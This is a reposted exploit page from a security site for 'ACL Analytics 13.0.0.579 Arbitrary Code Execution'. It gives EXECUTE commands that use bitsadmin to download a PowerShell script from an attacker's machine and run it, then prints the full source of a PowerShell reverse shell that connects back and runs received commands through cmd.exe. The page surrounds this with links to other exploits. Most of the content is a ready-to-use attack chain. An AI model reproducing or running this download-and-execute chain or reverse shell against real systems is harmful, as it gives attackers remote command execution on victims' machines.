首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
ACL Analytics 13.0.0.579 Arbitrary Code Execution
来源:vfocus.net 作者:Clutchisback1 发布时间:2018-03-14  
# Exploit Title: Arbitrary Code Execution
# Google Dork: N/A
# Date: 03-07-2018
# Exploit Author: Clutchisback1
# Vendor Homepage: https://www.acl.com
# Software Link: https://www.acl.com/products/acl-analytics/
# Version: 11.x - 13.0.0.579
# Tested on: Windows 7 pro SP1 x86
 
#########################################################################
#                    
#                
#   Clutchisback1 /\/\/\ I'll get OSCP one day! /\/\/\
#   Welcome to A_C_SHELLLLLL!! 
#   All Glory to Yeshua
#   Shoutouts to my Menotor: Ch33z_plz for teaching me everyday
#   and my Offsec Mentor: T0w3ntum introducing me to netsec!
#   (I have consent for those mentions :D)
#                
#                 
#########################################################################
 
 
EXECUTE 'bitsadmin /transfer myDownloadJob /download /priority high http://127.0.0.1/shell.ps1 c:\temp\shell.ps1'
 
 
EXECUTE "powershell C:\temp\shell.ps1"
 
Description/Usage:
Please use the script below to create a reverse shell payload that will be downloaded form your attacking machine and uploaded to the target host by bitsadmin and placed in the target c:\temp directory and saved as shell.ps1.
The second `Execute` command will execute the stored payload
 
 
Powershell Reverse Shell was downloaded from here: https://gist.github.com/staaldraad/204928a6004e89553a8d3db0ce527fd5
 
$socket = new-object System.Net.Sockets.TcpClient('127.0.0.1', 443);
if($socket -eq $null){exit 1}
$stream = $socket.GetStream();
$writer = new-object System.IO.StreamWriter($stream);
$buffer = new-object System.Byte[] 1024;
$encoding = new-object System.Text.AsciiEncoding;
do
{
 $writer.Flush();
 $read = $null;
 $res = ""
 while($stream.DataAvailable -or $read -eq $null) {
  $read = $stream.Read($buffer, 0, 1024)
 }
 $out = $encoding.GetString($buffer, 0, $read).Replace("`r`n","").Replace("`n","");
 if(!$out.equals("exit")){
  $args = "";
  if($out.IndexOf(' ') -gt -1){
   $args = $out.substring($out.IndexOf(' ')+1);
   $out = $out.substring(0,$out.IndexOf(' '));
   if($args.split(' ').length -gt 1){
                $pinfo = New-Object System.Diagnostics.ProcessStartInfo
                $pinfo.FileName = "cmd.exe"
                $pinfo.RedirectStandardError = $true
                $pinfo.RedirectStandardOutput = $true
                $pinfo.UseShellExecute = $false
                $pinfo.Arguments = "/c $out $args"
                $p = New-Object System.Diagnostics.Process
                $p.StartInfo = $pinfo
                $p.Start() | Out-Null
                $p.WaitForExit()
                $stdout = $p.StandardOutput.ReadToEnd()
                $stderr = $p.StandardError.ReadToEnd()
                if ($p.ExitCode -ne 0) {
                    $res = $stderr
                } else {
                    $res = $stdout
                }
   }
   else{
    $res = (&"$out" "$args") | out-string;
   }
  }
  else{
   $res = (&"$out") | out-string;
  }
  if($res -ne $null){
        $writer.WriteLine($res)
    }
 }
}While (!$out.equals("exit"))
$writer.close();
$socket.close();
$stream.Dispose()
END


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Yahoo! Messenger Webcam 8.1 Ac
·Apache 2.2.0 - 2.2.11 Remote e
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
·HT Editor File openning Stack
  相关文章
·SC 7.16 - Stack-Based Buffer O
·MikroTik RouterOS < 6.38.4 (x8
·Advantech WebAccess < 8.3 - Di
·DEWESoft X3 SP1 (64-bit) - Rem
·ManageEngine Applications Mana
·Sony Playstation 4 (PS4) 4.55
·Memcached 1.5.5 - 'Memcrashed
·memcached Proof of Concept Amp
·WebLog Expert Web Server Enter
·WebLog Expert Web Server Enter
·Eclipse Equinoxe OSGi Console
·CloudMe Sync 1.9.2 Remote Buff
  推荐广告
CopyRight © 2002-2018 VFocuS.Net All Rights Reserved